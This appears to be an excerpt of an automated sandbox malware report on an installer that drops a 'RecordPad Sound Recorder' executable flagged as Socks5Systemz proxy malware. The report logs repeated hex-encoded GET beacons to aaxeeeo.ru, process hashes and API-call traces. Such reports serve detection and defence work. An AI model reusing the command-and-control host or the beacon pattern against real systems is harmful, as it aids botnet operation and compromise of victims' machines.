                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.55265694.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:50.748248100 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:52.371663094 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:52.372464895 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.55265794.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:52.482821941 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:53.605895042 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.55265894.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:53.737195969 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:54.888930082 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.55265994.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:55.016661882 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:56.189399958 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.55266094.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:56.313009024 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:57.440124035 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:57 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.55266194.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:57.593794107 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:58.732775927 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.55266294.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:43:58.873533964 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:44:00.119187117 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:59 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.55266394.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jun 11, 2024 19:44:00.280297995 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:44:01.524300098 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:44:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20



                                                                                    Target ID:0
                                                                                    Start time:13:41:54
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\Desktop\tOniaJ21lj.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\tOniaJ21lj.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:4'969'628 bytes
                                                                                    MD5 hash:FA367A7D44377D2C3F684C3912FEC827
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:1
                                                                                    Start time:13:41:54
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:696'832 bytes
                                                                                    MD5 hash:8EF7001015E126E74BC41268504CA1E2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:3
                                                                                    Start time:13:41:55
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i
                                                                                    Imagebase:0x400000
                                                                                    File size:2'963'553 bytes
                                                                                    MD5 hash:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.2033651879.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 42%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:13:41:56
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s
                                                                                    Imagebase:0x400000
                                                                                    File size:2'963'553 bytes
                                                                                    MD5 hash:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.2036104577.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:7
                                                                                    Start time:13:42:40
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                    Imagebase:0x7ff7e52b0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false


                                                                                      Execution Graph

                                                                                      Execution Coverage:21.2%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:2.3%
                                                                                      Total number of Nodes:1514
                                                                                      Total number of Limit Nodes:21
execution_graph
4 API calls 5733->5741 5738 4034f0 4 API calls 5734->5738 5736 4034f0 4 API calls 5735->5736 5740 403322 5736->5740 5737->5693 5738->5740 5739->5733 5740->5693 5741->5737 5743 406a50 4 API calls 5742->5743 5744 406b01 5743->5744 5745 403198 4 API calls 5744->5745 5746 406b1f 5745->5746 5746->5698 5748 4033b4 4 API calls 5747->5748 5749 4098c3 5748->5749 5750 4098f5 CreateProcessA 5749->5750 5751 409901 5750->5751 5752 409908 CloseHandle 5750->5752 5753 409460 21 API calls 5751->5753 5754 409911 5752->5754 5753->5752 5807 40985c 5754->5807 5757 40992d 5758 40985c 3 API calls 5757->5758 5759 409932 GetExitCodeProcess CloseHandle 5758->5759 5760 409952 5759->5760 5761 403198 4 API calls 5760->5761 5762 40995a 5761->5762 5762->5703 5763 40969c 5762->5763 5764 4096a4 5763->5764 5768 4096de 5763->5768 5765 403420 4 API calls 5764->5765 5764->5768 5766 4096d8 5765->5766 5811 408da4 5766->5811 5768->5703 5770 409456 5769->5770 5771 40940f 5769->5771 5770->5705 5771->5770 5772 409417 Sleep 5771->5772 5773 409427 Sleep 5771->5773 5775 40943e GetLastError 5771->5775 5827 408ee0 5771->5827 5772->5771 5773->5771 5775->5770 5776 409448 GetLastError 5775->5776 5776->5770 5776->5771 5778 403591 5777->5778 5779 4035a0 5777->5779 5782 4035d0 5778->5782 5783 40359b 5778->5783 5787 4035b6 5778->5787 5780 4035b1 5779->5780 5781 4035b8 5779->5781 5784 403198 4 API calls 5780->5784 5785 4031b8 4 API calls 5781->5785 5782->5787 5788 40357c 4 API calls 5782->5788 5783->5779 5786 4035ec 5783->5786 5784->5787 5785->5787 5786->5787 5844 403554 5786->5844 5787->5713 5788->5782 5791 4050f8 19 API calls 5790->5791 5792 404c02 5791->5792 5792->5718 5794 408cec 5793->5794 5797 408ba4 5794->5797 5798 403198 4 API calls 5797->5798 5806 408bd5 5797->5806 5798->5806 5799 408c00 5800 4031b8 4 API calls 5799->5800 5802 408c8d 5800->5802 5801 408bec 5804 4032fc 4 API calls 5801->5804 5802->5722 5803 403278 4 API calls 5803->5806 5804->5799 5805 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 
5805->5806 5806->5799 5806->5801 5806->5803 5806->5805 5808 409870 PeekMessageA 5807->5808 5809 409882 MsgWaitForMultipleObjects 5808->5809 5810 409864 TranslateMessage DispatchMessageA 5808->5810 5809->5754 5809->5757 5810->5808 5812 408db2 5811->5812 5814 408dca 5812->5814 5824 408d3c 5812->5824 5815 408d3c 4 API calls 5814->5815 5816 408dee 5814->5816 5815->5816 5817 407878 InterlockedExchange 5816->5817 5818 408e09 5817->5818 5819 408d3c 4 API calls 5818->5819 5821 408e1c 5818->5821 5819->5821 5820 408d3c 4 API calls 5820->5821 5821->5820 5822 403278 4 API calls 5821->5822 5823 408e4b 5821->5823 5822->5821 5823->5768 5825 4057e0 4 API calls 5824->5825 5826 408d4d 5825->5826 5826->5814 5835 408e94 5827->5835 5829 408ef6 5830 408efa 5829->5830 5831 408f16 DeleteFileA GetLastError 5829->5831 5830->5771 5832 408f34 5831->5832 5841 408ed0 5832->5841 5836 408ea2 5835->5836 5837 408e9e 5835->5837 5838 408ec4 SetLastError 5836->5838 5839 408eab Wow64DisableWow64FsRedirection 5836->5839 5837->5829 5840 408ebf 5838->5840 5839->5840 5840->5829 5842 408ed5 Wow64RevertWow64FsRedirection 5841->5842 5843 408edf 5841->5843 5842->5843 5843->5771 5845 403566 5844->5845 5847 403578 5845->5847 5848 403604 5845->5848 5847->5786 5849 40357c 5848->5849 5852 4035d0 5849->5852 5853 40359b 5849->5853 5856 4035a0 5849->5856 5858 4035b6 5849->5858 5850 4035b1 5854 403198 4 API calls 5850->5854 5851 4035b8 5855 4031b8 4 API calls 5851->5855 5852->5858 5859 40357c 4 API calls 5852->5859 5853->5856 5857 4035ec 5853->5857 5854->5858 5855->5858 5856->5850 5856->5851 5857->5858 5860 403554 4 API calls 5857->5860 5858->5845 5859->5852 5860->5857 6712 4065dc IsDBCSLeadByte 6713 4065f4 6712->6713 6724 402be9 RaiseException 6725 402c04 6724->6725 6035 409ef0 6036 409f15 6035->6036 6037 407878 InterlockedExchange 6036->6037 6038 409f3f 6037->6038 6039 409984 4 API calls 6038->6039 6040 409f4f 6038->6040 6039->6040 6045 40760c SetEndOfFile 6040->6045 6042 409f6b 6043 4025ac 4 API calls 6042->6043 
6044 409fa2 6043->6044 6046 407623 6045->6046 6047 40761c 6045->6047 6046->6042 6048 4073ec 21 API calls 6047->6048 6048->6046 6049 402af2 6050 402afe 6049->6050 6053 402ed0 6050->6053 6054 403154 4 API calls 6053->6054 6056 402ee0 6054->6056 6055 402b03 6056->6055 6058 402b0c 6056->6058 6059 402b25 6058->6059 6060 402b15 RaiseException 6058->6060 6059->6055 6060->6059 6061 405af2 6063 405af4 6061->6063 6062 405b30 6065 405890 5 API calls 6062->6065 6063->6062 6064 405b2a 6063->6064 6068 405b47 6063->6068 6064->6062 6066 405b9c 6064->6066 6067 405b43 6065->6067 6069 405900 19 API calls 6066->6069 6072 403198 4 API calls 6067->6072 6070 404c2c 5 API calls 6068->6070 6069->6067 6071 405b70 6070->6071 6073 405900 19 API calls 6071->6073 6074 405bd6 6072->6074 6073->6067 6726 402dfa 6727 402e26 6726->6727 6728 402e0d 6726->6728 6730 402ba4 6728->6730 6731 402bc9 6730->6731 6732 402bad 6730->6732 6731->6727 6733 402bb5 RaiseException 6732->6733 6733->6731 6734 4097fc 6735 409815 6734->6735 6736 40980b 6734->6736 6736->6735 6737 40983a CallWindowProcA 6736->6737 6737->6735 6097 403a80 CloseHandle 6098 403a90 6097->6098 6099 403a91 GetLastError 6097->6099 6100 404283 6101 4042c3 6100->6101 6102 403154 4 API calls 6101->6102 6103 404323 6102->6103 6742 404185 6743 4041ff 6742->6743 6744 4041cc 6743->6744 6745 403154 4 API calls 6743->6745 6746 404323 6745->6746 6104 403e87 6105 403e4c 6104->6105 6106 403e67 6105->6106 6107 403e62 6105->6107 6108 403e7b 6105->6108 6111 403e78 6106->6111 6117 402674 6106->6117 6113 403cc8 6107->6113 6110 402674 4 API calls 6108->6110 6110->6111 6114 403cd6 6113->6114 6115 403ceb 6114->6115 6116 402674 4 API calls 6114->6116 6115->6106 6116->6115 6118 403154 4 API calls 6117->6118 6119 40267a 6118->6119 6119->6111 5870 40758c ReadFile 5871 4075c3 5870->5871 5872 4075ac 5870->5872 5873 4075b2 GetLastError 5872->5873 5874 4075bc 5872->5874 5873->5871 5873->5874 5875 4073ec 21 API calls 5874->5875 5875->5871 6120 40708e 6121 407078 6120->6121 
6122 403198 4 API calls 6121->6122 6123 407080 6122->6123 6124 403198 4 API calls 6123->6124 6125 407088 6124->6125 6130 403e95 6131 403e4c 6130->6131 6132 403e67 6131->6132 6133 403e62 6131->6133 6134 403e7b 6131->6134 6137 403e78 6132->6137 6138 402674 4 API calls 6132->6138 6135 403cc8 4 API calls 6133->6135 6136 402674 4 API calls 6134->6136 6135->6132 6136->6137 6138->6137 6139 403a97 6140 403aac 6139->6140 6141 403bbc GetStdHandle 6140->6141 6142 403b0e CreateFileA 6140->6142 6152 403ab2 6140->6152 6143 403c17 GetLastError 6141->6143 6147 403bba 6141->6147 6142->6143 6144 403b2c 6142->6144 6143->6152 6146 403b3b GetFileSize 6144->6146 6144->6147 6146->6143 6148 403b4e SetFilePointer 6146->6148 6149 403be7 GetFileType 6147->6149 6147->6152 6148->6143 6153 403b6a ReadFile 6148->6153 6151 403c02 CloseHandle 6149->6151 6149->6152 6151->6152 6153->6143 6154 403b8c 6153->6154 6154->6147 6155 403b9f SetFilePointer 6154->6155 6155->6143 6156 403bb0 SetEndOfFile 6155->6156 6156->6143 6156->6147 5681 4074a8 5682 4074b4 CloseHandle 5681->5682 5683 4074bd 5681->5683 5682->5683 6759 40a1a9 6768 409514 6759->6768 6762 402f24 5 API calls 6763 40a1b3 6762->6763 6764 403198 4 API calls 6763->6764 6765 40a1d2 6764->6765 6766 403198 4 API calls 6765->6766 6767 40a1da 6766->6767 6777 4055fc 6768->6777 6770 40955d 6774 403198 4 API calls 6770->6774 6771 40952f 6771->6770 6783 40716c 6771->6783 6773 40954d 6776 409555 MessageBoxA 6773->6776 6775 409572 6774->6775 6775->6762 6775->6763 6776->6770 6778 403154 4 API calls 6777->6778 6779 405601 6778->6779 6780 405619 6779->6780 6781 403154 4 API calls 6779->6781 6780->6771 6782 40560f 6781->6782 6782->6771 6784 4055fc 4 API calls 6783->6784 6785 40717b 6784->6785 6786 407181 6785->6786 6788 40718f 6785->6788 6787 40322c 4 API calls 6786->6787 6789 40718d 6787->6789 6790 4071ab 6788->6790 6791 40719f 6788->6791 6789->6773 6801 4032b8 6790->6801 6794 407130 6791->6794 6795 40322c 4 API calls 6794->6795 6796 40713f 6795->6796 6797 
40715c 6796->6797 6798 4068b0 CharPrevA 6796->6798 6797->6789 6799 40714b 6798->6799 6799->6797 6800 4032fc 4 API calls 6799->6800 6800->6797 6802 403278 4 API calls 6801->6802 6803 4032c2 6802->6803 6803->6789 6804 4011aa 6805 4011ac GetStdHandle 6804->6805 6164 4028ac 6165 402594 4 API calls 6164->6165 6166 4028b6 6165->6166 6171 4050b0 6172 4050c3 6171->6172 6173 404da8 19 API calls 6172->6173 6174 4050d7 6173->6174 6814 409fb4 6815 409fe4 6814->6815 6816 409fee CreateWindowExA SetWindowLongA 6815->6816 6817 4050e4 19 API calls 6816->6817 6818 40a071 6817->6818 6819 4032fc 4 API calls 6818->6819 6820 40a07f 6819->6820 6821 4032fc 4 API calls 6820->6821 6822 40a08c 6821->6822 6823 406adc 5 API calls 6822->6823 6824 40a098 6823->6824 6825 4032fc 4 API calls 6824->6825 6826 40a0a1 6825->6826 6827 409888 29 API calls 6826->6827 6828 40a0b3 6827->6828 6829 40969c 5 API calls 6828->6829 6830 40a0c6 6828->6830 6829->6830 6831 40a0ff 6830->6831 6832 4093fc 9 API calls 6830->6832 6833 40a118 6831->6833 6836 40a112 RemoveDirectoryA 6831->6836 6832->6831 6834 40a121 73A15CF0 6833->6834 6835 40a12c 6833->6835 6834->6835 6837 40a154 6835->6837 6838 40357c 4 API calls 6835->6838 6836->6833 6839 40a14a 6838->6839 6840 4025ac 4 API calls 6839->6840 6840->6837 6175 401ab9 6176 401a96 6175->6176 6177 401aa9 RtlDeleteCriticalSection 6176->6177 6178 401a9f RtlLeaveCriticalSection 6176->6178 6178->6177

                                                                                      Control-flow Graph (basic blocks of the function at 00409A14, flattened from the graph view; the executed / not-executed colouring is not recoverable from the extracted text)
                                                                                      • 409a14-409a38: GetSystemInfo, VirtualQuery (entry; the first query starts at the image base 00400000)
                                                                                      • 409aa9-409abb: VirtualQuery (loop head; control returns to it via 409abd-409ac2 and 409a40-409a47, so the function walks successive memory regions)
                                                                                      • 409a68-409a79: VirtualProtect (inside the loop; this is the call with flNewProtect = 00000040, PAGE_EXECUTE_READWRITE)
                                                                                      • 409a81-409a8a: call 409a0c
                                                                                      • 409a97-409aa4: VirtualProtect (second call in the same iteration, then back to the VirtualQuery block)
                                                                                      • 409ac8-409acf: exit
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00409A26
                                                                                      • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
                                                                                      • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2441996862-0
                                                                                      • Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                                      • Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
                                                                                      • Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                                      • Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59
                                                                                      APIs
                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
